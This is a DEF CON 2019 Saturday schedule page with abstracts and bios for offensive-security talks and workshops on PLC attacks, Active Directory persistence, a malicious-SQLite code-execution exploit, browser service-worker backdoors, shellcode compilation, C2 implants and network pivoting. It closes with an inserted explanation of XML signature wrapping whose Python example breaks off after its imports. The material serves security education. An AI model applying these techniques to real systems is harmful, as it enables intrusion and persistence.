https://github.com/ufrisk/pcileech https://github.com/ufrisk/MemProcFS

Ulf Frisk
Ulf is a pentester by day, and a Security Researcher by night. Ulf is the author of the PCILeech direct memory access attack toolkit and the Memory Process File System. Ulf has previously presented his work at DEF CON, the Chaos Communication Congress and BlueHatIL. Ulf is interested in things low-level and primarily focuses on Memory Analysis and Direct Memory Access.

Ian Vitek
Ian Vitek has a background as a pentester but now works with information security in the Swedish financial sector. Ian has held several presentations at DEF CON, BSidesLV and other IT security conferences. In recent years he has also performed as a DJ (VJ Q.Alba) at DEF CON and related private parties. He is interested in web, layer 2, DMA and local PIN bypass attacks.



Workshops - ( Sold Out ) - Flamingo - Lower Level - Valley of Fire II - Saturday - 14:30-18:30


Pentesting ICS 102

Saturday, 1430-1830 in Flamingo, Valley of Fire II

Alexandrine Torrents Consultant, Wavestone

Arnaud Soullié Manager, Wavestone

ICS cybersecurity has been a new subject for years now, especially since Stuxnet. Has the security level of ICS improved?

Well, even if ICS are more and more interconnected, we can probably say yes for network segmentation, as well as patching. And it is mostly true for critical infrastructures that must comply with multiple laws around the world. But what about the most critical components such as PLCs?

In this workshop, you will learn how to attack PLCs, by attacking ICS protocols: a well-known legacy protocol, Modbus, as well as an open source protocol considered as the future of ICS communications, OPC-UA. And to do so, what could be better than giving you hands-on experience on real devices by hacking our model train?

We will start by defining industrial control systems and their main components, as well as explaining the key risks and vulnerabilities that affect them. We will then focus on their key assets, Programmable Logic Controllers (PLCs), and discover how they work, how they communicate and how they can be programmed, to learn the methods and tools you can use to p*wn them.

Then we will move on to the real world by attacking real PLCs from two major manufacturers on a dedicated setup featuring robot arms and a model train! And to conclude, probably the most difficult part, let's discuss how to secure ICS communications.

Skill Level Beginner

Prerequisites: A knowledge of penetration testing is a plus, but we try to make it work for newbies as well.

Materials: A computer with 4 GB of RAM, 30 GB of disk space and VirtualBox. We will provide a virtual machine for attendees.

Max students: 40

Registration: https://www.eventbrite.com/e/pentesting-ics-102-valley-of-fire-ii-tickets-64797701670
(Opens 8-Jul-19)

Alexandrine Torrents
Alexandrine Torrents is a cybersecurity consultant at Wavestone, a French consulting company. She specializes in penetration testing and has performed several security assessments of ICS. She worked on a few ICS models to demonstrate attacks on PLCs and developed a dedicated tool to query Siemens PLCs. Moreover, she also works on securing ICS in the scope of the French military law, which requires companies offering a vital service to the nation to comply with security rules.

Arnaud Soullié
Arnaud Soullié is a manager at Wavestone, performing security audits and leading R&D projects. He has a specific interest in Active Directory security as well as ICS, two subjects that tend to collide nowadays. He teaches ICS security and pentests workshops at security conferences (BlackHat Europe 2014, BSides Las Vegas 2015/2016, Brucon 2015/2017, DEFCON 24, DEFCON 26) as well as full trainings (Hack In Paris 2015 and 2018, BlackHat Asia 2019).



PHVT - Bally's - Indigo Tower - 26th Floor - Saturday - 13:00-13:59


Phishing Freakonomics

Russell Butturini

This presentation is the story of the successes and failures of building a security awareness program at a Top 20 CPA firm, and of finding "the hidden side" of why users fail phishing exercises (both simulated and not!). The presentation will cover how Elasticsearch was used to correlate awareness training, phishing test, and HR data together, examine real results from this work, and the improvements that were made to raise user awareness and reduce phishing-related security incidents.

Russell Butturini (Twitter: @tcstoolhax0r) is head of information security for a top 20 CPA and financial services firm. He has authored tools for both red and blue teams with his C and Python coding skills. His most popular tool, NoSQLMap, was featured in The Hacker Playbook 2.



RCV - Planet Hollywood - Celebrity 5 Ballroom - Saturday - 16:15-16:59


LIVE TOOL DEMO

PIE - A hardware based Prebellico Intelligence Exfiltration Botnet

1615 - 1700



DL - Planet Hollywood - Sunset 3 - Saturday - 14:00 - 15:50


PivotSuite: Hack The Hidden Network - A Network Pivoting Toolkit

Saturday from 14:00 – 15:50 in Sunset 3 at Planet Hollywood
Audience: Offense (Red Teamers / Penetration Testers)

Manish Gupta

PivotSuite is a portable, platform-independent and powerful network pivoting toolkit which helps Red Teamers / Penetration Testers use a compromised system to move around inside a network. It is a standalone utility which can be used as a server or as a client. PivotSuite as a Server: if the compromised host is directly accessible (forward connection) from our pentest machine, then we can run PivotSuite as a server on the compromised machine and reach hosts on the other subnets from our pentest machine, hosts that were previously only accessible from the compromised machine. PivotSuite as a Client: if the compromised host is behind a firewall / NAT and isn't directly accessible from our pentest machine, then we can run PivotSuite as a server on the pentest machine and as a client on the compromised machine to create a reverse tunnel (reverse connection). Using this we can reach hosts on the other subnets from our pentest machine, hosts that were previously only accessible from the compromised machine.

https://github.com/RedTeamOperations/PivotSuite

Manish Gupta
Manish Gupta is a Cyber Security Analyst at Societe Generale in India, where he specializes in Offensive Security and Red Teaming activities in banking environments. He is a part-time Bug Bounty Hunter and CTF Player. His research interests include real-world cyber attack simulation and Advanced Persistent Threats (APT). He is currently working on developing an open-source Offensive Security Toolkit which helps Red Teamers / Penetration Testers.



DC - Paris - Track 1 - Saturday - 13:00-13:45


RACE - Minimal Rights and ACE for Active Directory Dominance

Saturday at 13:00 in Track 1
45 minutes | Demo, Tool

Nikhil Mittal PentesterAcademy

User rights and privileges are a part of the access control model in Active Directory. Applicable only at the local computer level, a user generally has different rights (through access tokens) on different machines in a domain. Another part of the access control model is security descriptors (ACLs) that protect a securable object. At the domain level, ACL abuse is well known and adversaries have used it for persistence. For user rights, the abuse is mostly with the help of groups (memberships, SID History etc.) or misconfigured delegated rights.

A lesser-known area of abuse and offensive research is a combination of minimal Rights and ACE (hence the term RACE). Often overlooked in audits and assessments, using minimal rights along with favourable ACEs provides a very interesting technique of persistence and on-demand privilege escalation on a Windows machine with much desired stealth.

This talk covers interesting domain privilege escalation, persistence and backdoor techniques with the help of ACLs, minimal user rights and combinations of both. We will discuss how these techniques can be applied using open source tools and scripts. The talk also covers how to detect and mitigate such attacks. The talk will be full of live demonstrations.

Nikhil Mittal
Nikhil Mittal is a hacker, infosec researcher, speaker and enthusiast. His areas of interest include red teaming, Active Directory security, attack research, defense strategies and post-exploitation research. He has 10+ years of experience in red teaming. He specializes in assessing security risks in secure environments that require novel attack vectors and an "out of the box" approach. He has worked extensively on Active Directory attacks, defense and bypassing detection mechanisms, and on Offensive PowerShell for red teaming. He is the creator of multiple tools like Nishang, a post-exploitation framework in PowerShell, and Deploy-Deception, a framework for deploying Active Directory deception. In his spare time, Nikhil researches new attack methodologies and updates his tools and frameworks.

Nikhil has held trainings and boot camps for various corporate clients (in US, Europe and SE Asia), and at the world's top information security conferences. He has spoken/trained at conferences like DEF CON, BlackHat, CanSecWest, BruCON, 44CON and more. He blogs at https://www.labofapenetrationtester.com/

Twitter: @nikhil_mitt
Blog: https://labofapenetrationtester.com/



RTV - Flamingo 3rd Floor - Laughlin I,II Rooms - Saturday - 14:30-15:30


Red Team Framework (RTF)

Abstract and Bio coming soon!



SEV - Bally's Jubilee Tower - 3rd Floor - Saturday - 17:40-18:09


Saturday August 10 2019 1740 30 mins
RED TEAMING – FROM DOWN UNDER
If there is one red teaming talk you NEED TO HEAR – it is this one. BIO and Abstract coming

Wayne Ronaldson:
Wayne is an experienced tester, having conducted security assessments for a range of leading organizations. Wayne has expertise in Red Team Assessments, Physical, Digital and Social, and has presented to a number of organizations and government departments on the current and future state of the security landscape.



Workshops - ( Sold Out ) - Flamingo - Lower Level - Valley of Fire I - Saturday - 10:00-13:59


Red Teaming Techniques for Electronic Physical Security Systems

Saturday, 1000-1400 in Flamingo, Valley of Fire I

Valerie Thomas Technical Lead, Securicon

Terry Gold Founder, D6 Research

Organizations spend millions of dollars to keep their assets safe with physical security systems, but these are not without flaws. This course is designed to help you assess, strategize, and navigate your way through complex electronic physical access control systems and into the largest enterprise organizations. In this course, we will cover enterprise architecture, access control systems, wiring, protocols, controllers, door readers, RFID technologies and techniques, magnetic stripe and PIN attacks, as well as blending in social engineering attacks. With our complete physical access lab you'll get hands-on experience analyzing and programming multiple RFID card formats.

Skill Level Beginner

Prerequisites: None. Previous experience is not required

Materials: For students who wish to participate in the hands-on portion, a laptop (Windows, Linux, or OSX) with at least one available USB port. Students will need local administrative privileges for software installation.

Max students: 40

Registration: https://www.eventbrite.com/e/red-teaming-techniques-for-electronic-physical-security-systems-valley-of-fire-i-tickets-63606408480
(Opens 8-Jul-19)

Valerie Thomas
Valerie Thomas is the Technical Director and utilizes her Electrical Engineering education and security consulting background to incorporate a variety of evaluation techniques specific to ICS.

Terry Gold
Terry is the founder of D6 Research, an independent security analyst firm specializing in identity credentialing, authentication and access control. Terry has spent the last 15 years specializing in large scale enterprise assessments, strategy and remediation for both information and physical security. Terry is a trusted advisor to the enterprise information security, audit, and white hat communities. He is a frequent speaker and trainer to private industry and law enforcement, and is engaged with specialized red teams and active investigations for assistance with situations that involve identity and fraud related crime and attacks.



DC - Paris - Track 1 - Saturday - 16:00-16:30


Reverse Engineering 17+ Cars in Less Than 10 Minutes

Saturday at 16:00 in Track 1
20 minutes | Demo, Tool

Brent Stone

Brent provides a live demonstration of reverse engineering 17 or more unknown passenger vehicle CAN networks in under 10 minutes using new automated techniques. These unsupervised techniques are over 90% accurate and consistent when tested on production CAN networks under different driving conditions. He then introduces the Python and R code used for the demo, posted to his public GitHub repository at https://github.com/brent-stone/CAN_Reverse_Engineering. The dissertation explaining how the code works is also posted there.

Brent Stone
Dr. Brent Stone is a Cyber officer with the U.S. Military. His professional experience includes 10 years of IT and cyber work in North America, the Middle East, and Asia. The focus of his PhD research was developing AI methods to help security researchers overcome the 'security through obscurity' used in the automotive industry. He presented initial findings at the 2018 IEEE Connected and Automated Vehicles Symposium and is an active member of the Open Garages car hacking group. He holds a B.S. in Computer Science from West Point, an M.S. in IT security from Carnegie Mellon, and a PhD in Computer Science from the Air Force Institute of Technology.

Github: https://github.com/brent-stone



DC - Paris - Track 2 - Saturday - 15:00-15:45


Reverse-Engineering 4g Hotspots for Fun, Bugs and Net Financial Loss

Saturday at 15:00 in Track 2
45 minutes | Demo, Tool

g richter Senior Researcher, Pen Test Partners LLP

“5G is coming” (apparently). That probably means, over the next few years, more and more people are going to be using more and more cellular-connected devices for their day-to-day TCP/IP activities.

The problem is, a lot of existing 4G modems and routers are pretty insecure. We found critical remotely-exploitable flaws in a selection of devices from a variety of vendors, without having to do too much work. Plus, there's only a small pool of OEMs working seriously with cellular technologies, and their hardware (and software dependencies) can be found running in all sorts of places. Their old 4G, 3G and even 2G-era code is going to be running in these 5G-capable devices.

With a small sample of consumer 4G routers as examples, we’re going to talk about how malleable, frustrating, and insecure these devices are. We’ll run through a few examples of existing 4G routers, from low-end bargain-basement end-of-life-never-to-be-fixed to higher-end devices. root is a means to an end, rather than the goal.

g richter
g richter is the single-use pseudonym of a security researcher with a particular interest in embedded devices and cellular. He has done this kind of thing for money and fun for quite a while now, but before that, he also did other things that didn't involve as many computers. At the moment he's doing this for money at Pen Test Partners.



DC - Paris - Track 2 - Saturday - 10:00-10:45


Rise of the Hypebots: Scripting Streetwear

Saturday at 10:00 in Track 2
45 minutes | Demo

finalphoenix Engineer & Hypebae

Buying Supreme is even harder when most of your competitors are AI. The era of bot purchasing has arrived and more often than not, purchasing shoes, shirts, and swag, requires shell scripting. We will look at how simplistic (and how complicated) purchasing bots have become, how to write them, and what companies are trying to do to fight them, and why they’re failing at conquering the machines.

finalphoenix
finalphoenix is a full-stack engineer who has been working on the web since man invented fire gifs. She likes React, Node, and the Unix fortune command. She specializes in web security and optimization, and in the process, discovered the dangerous world of automation to help her shop.

Twitter: @finalphoenix



PHVT - Bally's - Indigo Tower - 26th Floor - Saturday - 15:30-15:59


Sandbox Creative Usage For Fun and Pro...Blems

Cesare Pizzi, Sorint.lab

Malware analysis sandboxes are pervading our IT environments and the internet as well. So, a lot of systems are available to be used, and may be abused. Let's have a look at what we can get there and get your own tools ready to express yourself in this field.

Cesare Pizzi (Twitter: @red5heep) is a computer and technology enthusiast from the early '80s. Computers and programming were his hobbies and then also became a real job. On the professional side, he has worked for more than 20 years in the IT field, covering a lot of different roles over the years: programmer, system admin, DBA and, in the last years, network and security engineer and analyst.



ICS - Bally's Event Center - Saturday - 12:30-12:59


SCADA: What the next Stuxnet will look like and how to prevent it

August 10, 2019 12:30 PM

In 2019, almost a decade after the famed Stuxnet worm silently wreaked havoc on an Iranian uranium enrichment plant, SCADA vendors still have gaping holes in their PLC and HMI development environments. Our new research into 4 different PLC vendor software systems details an almost negligent lack of security standards in modern SCADA environments. This lack of security creates great opportunity for future attackers and the next high-profile attack on industrial control systems. The attack scenario cannot be understated, as critical systems such as power, water, transportation, and manufacturing all rely on major PLC vendors in one way or another. We will show a theoretical attack that could have happened using recently discovered vulnerabilities and proof of concept code to disrupt a major industrial power system. We share our observations on vulnerabilities found in vendors across the board and mitigation techniques for using this required software in highly critical environments where even air-gapping is not enough to remove the threat of a remote attacker.

Speaker Information

Panelist Information

Joseph Bingham

Tenable

Before joining Tenable in 2014, Joseph worked at Symantec doing malware reverse engineering. Since joining Tenable as a reverse engineer, Joseph has developed low-level protocol functionality for Nessus, analyzed different classes of remote code execution vulnerabilities, and written many remote exploitation plugins. He has presented at VirusBulletin and BSides and has produced several publications on malware, exploitation, and reverse engineering.



CLV - Flamingo 3rd Floor - Reno I Room - Saturday - 14:25-15:05


Speaker: James Strassburg

Twitter: @jstrassburg

Abstract: The programmability of the cloud has revolutionized infrastructure deployments at scale and, at the same time, has enabled the automation of both the attack and defense of these deployments. In this talk, I will discuss the open-source tools and the techniques that my organization has used to scale security in the cloud to keep pace with our deployments. I'll also cover how we've used automation to adapt security processes to cloud strategies such as immutable servers. Some topics include: temporal leasing of API access keys and database credentials, automation of patching groups and scans, and automated enforcement of configuration policy.

About James: James Strassburg is an experienced software engineer, architect, researcher, and speaker. He has been building distributed software systems and web applications for the past 20 years. Most recently specializing in cloud migration and search engineering, he is an automation fanatic who has also worked on systems engineering, full-stack development, information security, artificial intelligence (AI), and DevOps, and has spoken on several related topics.



Workshops - ( Sold Out ) - Flamingo - Lower Level - Lake Mead I - Saturday - 14:30-18:30


scapy_dojo_v_1

Saturday, 1430-1830 in Flamingo, Lake Mead I

Hugo Trovao Hacker

Rushikesh D. Nandedkar Hacker

The workshop aims to make beginners aware of and comfortable with the various facets of Scapy and its real-world uses in various penetration testing tasks.

The flow of the workshop will be as follows:
1. Scapy basics
2. TCP basics
3. DHCP server
4. DHCP server flooder || DNS/MDNS
5. Crafting a layer using Scapy
6. Fuzzing protocols with Scapy
7. Covert channel using Scapy
8. Scapy-radio

Added value to the workshop:

What attendees will learn:
- sending/receiving/displaying/modifying packets with Scapy
- implementing custom layers in Scapy
- implementing answering machines in Scapy
- constructing tools that implement some real-life examples
- simple fuzzing through Scapy and generators
- decoding live traffic with an implemented protocol

By working in Scapy, attendees will consequently also learn:
- TCP basics
- DHCP/DNS/MDNS basics
- AJP13 protocol
- fuzzing
- Scapy-radio

Plus: a prebuilt VM containing all scripts and dependencies in place.

An ISO in progress can be found at: https://drive.google.com/open?id=1wJ9OQOAnew3upyoFdMUz1hlo0WEuogJW (/root contains install script. /src contains scripts. python-netaddr dependency needs to be installed manually as of now with apt.)

Skill Level Beginner

Prerequisites: Basics of Python scripting and networks.

Materials: For Windows users:
1. VirtualBox installed
2. Administrator privileges
3. 4GB+ RAM
4. 50 GB free space

For *nix users:
1. VirtualBox installed (optional)
2. Root privileges
3. 4GB+ RAM
4. 50 GB free space
(In case *nix users do not want to use VirtualBox, they can run the scripts directly on their boxes, provided Python and Scapy are installed there.)

Max students: 26

Registration: https://www.eventbrite.com/e/scapy-dojo-v-1-lake-mead-i-tickets-63439609580
(Opens 8-Jul-19)

Hugo Trovao
Hugo has been a computer enthusiast since he was a kid and has always been curious to know how things work. He liked everything related to computers. He's a researcher by passion, a consultant by job and a penetration tester by heart. He finds himself at peace while poking holes in applications/networks/systems, while writing security tools tailored to an assessment's requirements, and indeed while meditating. He always wants to know a better, more efficient way of doing things.

Rushikesh D. Nandedkar
He is a security analyst. Having more than six years of experience under his belt, his assignments have always been pointed towards reducing the state of insecurity for information. His research papers were accepted at NCACNS 2013, nullcon '14 & '18, HITCON '14, Defcamp '14, BruCON '15 '16 '17 '18, DEFCON 24, x33fcon '17 & '18, c0c0n-X '17, Bsides Delhi '17, BlackHat USA '18, DEFCON 26 + Co-author of "DECEPTICON," an intelligent evil-twin. Being an avid CTF player, for him, solace is messing up with packets, frames, and shellcodes.



CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - Saturday - 12:00-11:59


Scrubber: An open source compilation to protect journalistic sources

No description available



BCV - Flamingo 3rd Floor - Laughlin III Room - Saturday - 12:00-12:50


Secrets Worlds in Plain Web. The BlockChain DNS.

No description available



BCV - Flamingo 3rd Floor - Laughlin III Room - Saturday - 11:35-11:59


Securing the Unknown: A Methodology for Auditing Smart Contracts

No description available



PHVT - Bally's - Indigo Tower - 26th Floor - Saturday - 14:30-14:59


Security to Make the CFO Happy

Adam, Engineer

As a security professional you're hungry to learn everything you can but training isn't quite free. Meanwhile, your boss, and the bosses in a bunch of other business units are fretting all they can about DoD 8570, just one more "unfunded mandate". How does anyone justify the cost of these nonfunctional requirements? This talk will draw some indirect lines in the org chart and cite documentation in various parts of a company to show how training can be a win for the entire organization.

Adam is an engineer. Several years ago, Adam's program got whacked with the compliance stick. If Adam wanted to fly he had to comply. In an odd turn of events, Adam found that all this security compliance made him level-up his systems engineering game. After satisfying a number of security "one-offs", Adam started to realize where non-engineers had strengths and willingness to bolster his program's overall security. As a lonely security engineer in a feature-driven world he credits the infosec community for providing so much "professional development". He is happy to show engineers how fun (less painful?) security can be. Tragically, he has yet to meet anyone who can wrestle failed vuln scanners as well as he can - but he knows that special someone is out there.



DC - Paris - Track 1 - Saturday - 14:00-14:45


SELECT code_execution FROM * USING SQLite;—Gaining code execution using a malicious SQLite database

Saturday at 14:00 in Track 1
45 minutes | Demo, Tool, Exploit

Omer Gull Security Researcher at Check Point Software Technologies

Everyone knows that databases are the crown jewels from a hacker's point of view, but what if you could use a database as the hacking tool itself? We discovered that simply querying a malicious SQLite database - can lead to Remote Code Execution. We used undocumented SQLite3 behavior and memory corruption vulnerabilities to take advantage of the assumption that querying a database is safe.

How? We created a rogue SQLite database that exploits the software used to open it. Exploring only a few of the possibilities this presents, we'll pwn password stealer backends while they parse credentials files and achieve iOS persistency by replacing its Contacts database…

The landscape is endless (Hint: Did someone say Windows 10 0-day?). This is extremely terrifying since SQLite3 is now practically built-in to any modern system.

In our talk we also discuss the SQLite internals and our novel approach for abusing them. We had to invent our own ROP chain technique using nothing but SQL CREATE statements. We used JOIN statements for heap spray and SELECT subqueries for x64 pointer unpacking and arithmetic. It's a new world of using the familiar Structured Query Language for exploitation primitives, laying the foundations for a generic leverage of memory corruption issues in database engines.

Omer Gull
Omer Gull is a vulnerability researcher in the Malware and Vulnerability Research group at Check Point Software Technologies.

Omer has a diverse background in security research, that includes web application penetration testing, RE and exploitation.

He loves Rum, Old School Hip-Hop and Memory Corruptions.

Twitter: @GullOmer



DL - Planet Hollywood - Sunset 6 - Saturday - 14:00 - 15:50


Shadow Workers: Backdooring with Service Workers

Saturday from 14:00 – 15:50 in Sunset 6 at Planet Hollywood
Audience: Offensive Security, AppSec

Emmanuel Law & Claudio Contin

This presentation is focused around Shadow Workers, a tool that came out of our research on service workers. Service Workers are a new addition to modern browsers and are often used to extend offline capabilities to a website. With this tool, we weaponized service workers to include the ability to implant a pseudo backdoor in the browser and ghost through a victim's browser session to sniff, manipulate, and even proxy data silently. We'll demo the various persistence mechanisms our tool provides to keep service workers alive and demo how MITM can be done at the browser layer.

https://github.com/shadow-workers/shadow-workers

Emmanuel Law
Emmanuel Law (@libnex) is currently a security engineer in the Bay Area. He spends his free time researching new ways to break stuff and has presented at various international conferences such as Black Hat Arsenal, Ruxcon, Kiwicon, Troopers etc.

Claudio Contin
Claudio Contin (@claudiocontin) is a security consultant with ZX Security in Wellington, New Zealand. Before working in security, he spent several years developing web applications. He has presented at BSides SF, Kiwicon and OWASP conferences. During his free time, he has contributed to various open-source projects such as the BeEF framework and Gophish.



DL - Planet Hollywood - Sunset 5 - Saturday - 14:00 - 15:50


Shellcode Compiler

Saturday from 14:00 – 15:50 in Sunset 5 at Planet Hollywood
Audience: Anyone interested in shellcode development

Ionut Popescu

Shellcode Compiler is a program that compiles C/C++ style code into small, position-independent and NULL-free shellcode for Windows and Linux. It is possible to call any Windows API function or Linux syscall in a user-friendly way. The tool allows users to write custom shellcodes by providing an easy way to call functions or system calls. It does not have all the capabilities of a compiler, but it greatly simplifies the shellcode development process. There is no need to write assembler; it is only required to declare and call functions or system calls. Under the hood there is, of course, a custom compiler which compiles C/C++ style code into ASM, which is later assembled using the Keystone framework. Before the tool presentation, we will go into a deep dive on the shellcode development process for both Windows and Linux (32 bits only, to keep it short and simple).

https://github.com/NytroRST/ShellcodeCompiler

Ionut Popescu
Ionut Popescu works as a Product Security Engineer for UiPath. His focus lies on web application penetration testing, source code review, security architecture review and providing security training. In his free time, he also likes to do research focusing on Windows internals, ASM and exploit development. Ionut is a regular speaker at different conferences, e.g. DEF CON, Defcamp or OWASP.



RTV - Flamingo 3rd Floor - Laughlin I,II Rooms - Saturday - 09:00-09:59


SiestaTime, A Red Team Automation Tool for Generation of Long-term Implants and Infrastructure Deployment  

Red Team operations require substantial effort to create both implants and a resilient C2 infrastructure. SiestaTime aims to merge these ideas into a tool with an easy-to-use GUI, which facilitates implant and infrastructure automation. SiestaTime allows operators to provide registrar, SaaS and VPS credentials in order to deploy a resilient and ready-to-use Red Team infrastructure in less than five minutes. The generated implants will blend in as legitimate traffic by communicating with the infrastructure using SaaS channels (e.g. GMail, Twitter). Use your battery of VPS/domains to deploy staging servers and inject your favorite shellcode for interactive sessions, clone sites and hide your implants ready to be downloaded, and deploy more redirectors if they get busted. SiestaTime is built entirely in Golang, with the ability to generate implants for multiple platforms, interact with different OS resources, and perform efficient C2 communications. Terraform helps to deploy/destroy the different infrastructure.

About Alvaro Folgado: Rebujacker works as a Product Security Engineer at Salesforce. He has multiple years of experience performing penetration tests and security assessments against different technologies, building automation tools for this purpose and performing application-level research. In recent years his field of study has focused on red teaming and automation. The combination of his application-level and offensive security knowledge leads him to build better and stealthier implants that blend in with the cloud infrastructure and application stacks of today's targeted organizations. Twitter: @rebujacker



DL - Planet Hollywood - Sunset 4 - Saturday - 14:00 - 15:50


SILENTTRINITY

Saturday from 14:00 – 15:50 in Sunset 4 at Planet Hollywood
Audience: Offense

Marcello Salvati

SILENTTRINITY is an asynchronous post-exploitation agent powered by Python, IronPython, C# and .NET's DLR (Dynamic Language Runtime). It attempts to weaponize and demonstrate the flexibility that BYOI (Bring Your Own Interpreter) payloads have over traditional C# implants. What are BYOI payloads? It turns out that by harnessing the sheer craziness of the .NET framework, you can embed entire interpreters inside of .NET languages, allowing you to natively execute scripts written in third-party languages (like Python) on Windows! Not only does this allow you to dynamically access all of the .NET API from a scripting language of your choosing, but it also allows you to remain completely in memory and has a number of advantages over traditional C# payloads! Essentially, BYOI payloads allow you to have all the "power" of PowerShell without going through PowerShell in any way! Additionally, you can nest multiple interpreters within each other to perform what I've coined "engine inception"! If you're interested in bleeding-edge and out-of-the-ordinary C#/.NET offensive tradecraft, this is the demo for you!

https://github.com/byt3bl33d3r/SILENTTRINITY

Marcello Salvati
Marcello Salvati (@byt3bl33d3r) is a Security Analyst at BlackHills Information Security by day and by night a tool developer who discovered a novel technique to turn tea, sushi, alcohol and dank memes into somewhat functioning code. His passions include anything Active Directory related, trolling people on GitHub and developing open-source tools for the security community at large, which he's been doing for the past several years. Some of his projects include SilentTrinity, CrackMapExec, DeathStar, RedBaron and many more.



CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - Saturday - 17:00-16:59


Snoop all Telegram messages

No description available



PHVT - Bally's - Indigo Tower - 26th Floor - Saturday - 11:00-11:59


Solving Crimes with Wireless GeoFencing and Multi-Zone Correlation Analytics

Gleb Esman, Senior Project Manager, Fraud Analytics and Research at Splunk Inc.

The presentation will introduce viewers to geofencing, the technique successfully used by law enforcement agencies to pinpoint suspects in an array of anonymous metadata coming from wireless devices. The presentation will teach viewers how to build such a system from scratch using freely downloadable analytical tools. Different ways to visually define geofencing zones and investigation constraints will be explained. Samples of working scripts, search queries, data formats and working dashboard layouts will be provided.

Gleb Esman (Twitter: @gesman) helps to guide research, product planning and development efforts in the areas of fraud detection, data security analytics and investigations at Splunk Inc. Currently Gleb manages a number of security projects in the healthcare space, such as a drug and opioid diversion platform and a healthcare privacy monitoring platform. Before Splunk, Gleb was engaged at Morgan Stanley overseeing a fraud detection platform and enterprise-wide data analytics systems within the retail banking space. During his career, Gleb worked in various positions at a number of enterprises involved in research and development of solutions against advanced malware and computer viruses, as well as solutions for secure payments and data protection in the e-commerce space. Gleb is the author of several patents in Deep Learning, Security, Behavior Biometrics and Healthcare Data Analytics.



BHV - Planet Hollywood - Melrose 1-3 Rooms - Saturday - 10:15-10:59


10:15 AM: Spectra: Open Biomedical Imaging
Speaker: Jean Rintoul

Abstract: Biomedical imaging has previously been expensive and near impossible to hack and experiment with. If more people experimented with and understood how imaging works, we could move it forward much faster and make these transformative technologies available to everyone. In this talk I'll present Spectra: a tiny 2" device that uses safe levels of AC current to recreate an image of any conductive material such as your lungs, arm or head, using the same tomographic reconstruction technique as a CAT scan.

Speaker Bio: Jean Rintoul wants to push forward a health technology commons. Previous experiences include bringing consumer electronic biosensor products to market from the Emotiv BCI to the Basis watch and Kiddo biosensor watch, and being published for her work in Cognitive Neuroscience in Nature.

T: @jeantoul


DL - Planet Hollywood - Sunset 4 - Saturday - 10:00 - 11:50


Srujan: Safer Networks for Smart Homes

Saturday from 10:00 – 11:50 in Sunset 4 at Planet Hollywood
Audience: Defense, Network, Hardware, IOT Security

Sanket Karpe & Parmanand Mishra

Srujan is a new type of network segregation system, based on Raspberry Pi, that can be easily deployed on home networks. It allows home users to segregate the devices connecting to their home networks based on their threat profile. Users can keep their smart home devices separate from their computers and mobile devices to mitigate the risk of cross-infection from low-trust devices like smart cameras, speakers and thermostats. Srujan was created to address the challenges around the plethora of IoT devices being deployed in smart homes that are vulnerable and do not receive patches. Srujan can intelligently segregate the home network into different zones based on the device type. It automatically identifies and alerts users when IoT devices attempt to contact any IP or domain which has been blacklisted by Google Safe Browsing.

Srujan provides the following features:

-- Intelligent segregation of devices based on their type
-- Ability to create network usage stats for each device
-- Ability to quarantine untrusted devices
-- Easy to integrate with SIEM
-- Ability to lookup IP/Domain against Google Safe Browsing.
-- Integration with ANWI (All New Wireless IDS)
-- Prevent call-home pings to manufacturer for enhanced privacy.

Sanket Karpe
Sanket Karpe is a security researcher with over a decade of experience in reverse engineering malware and incident response. He is currently working as a Manager, Malware Research at Qualys Inc, where his primary responsibilities include malware analysis, creating new malware detection techniques and tools development. He is the author of ANWI - All New Wireless IDS and likes to work on various IoT projects in his free time.

Parmanand Mishra
Parmanand Mishra is a security enthusiast who is currently working as Senior Malware Researcher at Qualys Inc. He works on malware analysis and adversary simulation based on ATT&CK and loves creating tools for the same. He has spoken at security conferences like c0c0n and goes by Kart1keya on GitHub.



DC - Paris - Track 4 - Saturday - 13:00-13:45


SSO Wars: The Token Menace

Saturday at 13:00 in Track 4
45 minutes | Demo, Tool, Exploit

Alvaro Muñoz Software Security Researcher @ Fortify (Micro Focus)

Oleksandr Mirosh Software Security Researcher @ Fortify (Micro Focus)

It is the year 2019. Humanity has almost won its long-standing war against Single-Sign On (SSO) bugs. The last of them were discovered and eradicated some time ago and the world is now living in an era of prosperity while the Auth Federation enjoys peaceful CVE-free times. However, while things seem to be running smoothly, new bugs are brewing at the core of major implementation libraries. This is probably the last chance for the evil empire to launch a world scale attack against the Auth Federation.

In this talk, we will present two new techniques:

  • 1) A new breed of SAML implementation flaws that break XML signature validation and enable arbitrary modification of the SAML assertion, which enables attackers to authenticate as arbitrary users or grant themselves arbitrary authorization claims. Although any implementation may be affected by this flaw, we will show how it affects Microsoft Windows Identity Framework (WIF) applications, Windows Communication Foundation (WCF) web services, and flagship products such as SharePoint and Exchange Servers.
  • 2) A bug in the .NET crypto library, which may allow attackers to gain Remote Code Execution (RCE) or Denial of Service (DoS) depending on the availability of code gadgets in the target server.

A new tool to detect this type of vulnerability will also be discussed and released.

Alvaro Muñoz
Alvaro Muñoz (@pwntester) is Principal Security Researcher at Micro Focus Fortify, where he researches new software vulnerabilities and implements systems to detect them. His research focuses on web application frameworks, where he looks for vulnerabilities or unsafe uses of APIs. Before joining the research team, he worked as an Application Security Consultant helping enterprises deploy application security programs. Muñoz has presented at many security conferences including BlackHat, DEF CON, RSA, OWASP AppSec US & EU, JavaOne, etc. and holds several infosec certifications, including OSCP, GWAPT and CISSP. He plays CTFs with the Spanish int3pids team and blogs at http://www.pwntester.com.

Twitter: @pwntester
Website: http://www.pwntester.com

Oleksandr Mirosh
Oleksandr Mirosh has over 11 years of computer security experience, including vulnerability research, penetration testing, reverse engineering, fuzzing, developing exploits and consulting. He is working for the Fortify Software Security Research team in Micro Focus, investigating and analyzing new threats, vulnerabilities, security weaknesses and new techniques for exploiting security issues, and developing vulnerability detection, protection and remediation rules. In the past, he has performed a wide variety of security assessments, including design and code reviews, threat modelling, testing and fuzzing in order to identify and remove any existing or potentially emerging security defects in the software of various customers.

Twitter: @olekmirosh
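The class of flaw described under (1) above, a consumer that verifies an XML signature and then trusts an element other than the one the signature actually covers, as an added example; this is not the speakers' code and not the specific WIF/WCF bug they disclosed. The wrapping trick shown (an unsigned Assertion inserted ahead of the signed one) is the classic XML Signature Wrapping illustration of that class. Assumptions for a dependency-free demo: an HMAC over a constructed secret stands in for the IdP's RSA signature, canonicalization is Python's `xml.etree.ElementTree.canonicalize` (3.8+), and the Response/Assertion/Signature elements are reduced to the parts the check needs.

```python
import hashlib
import hmac
import xml.etree.ElementTree as ET

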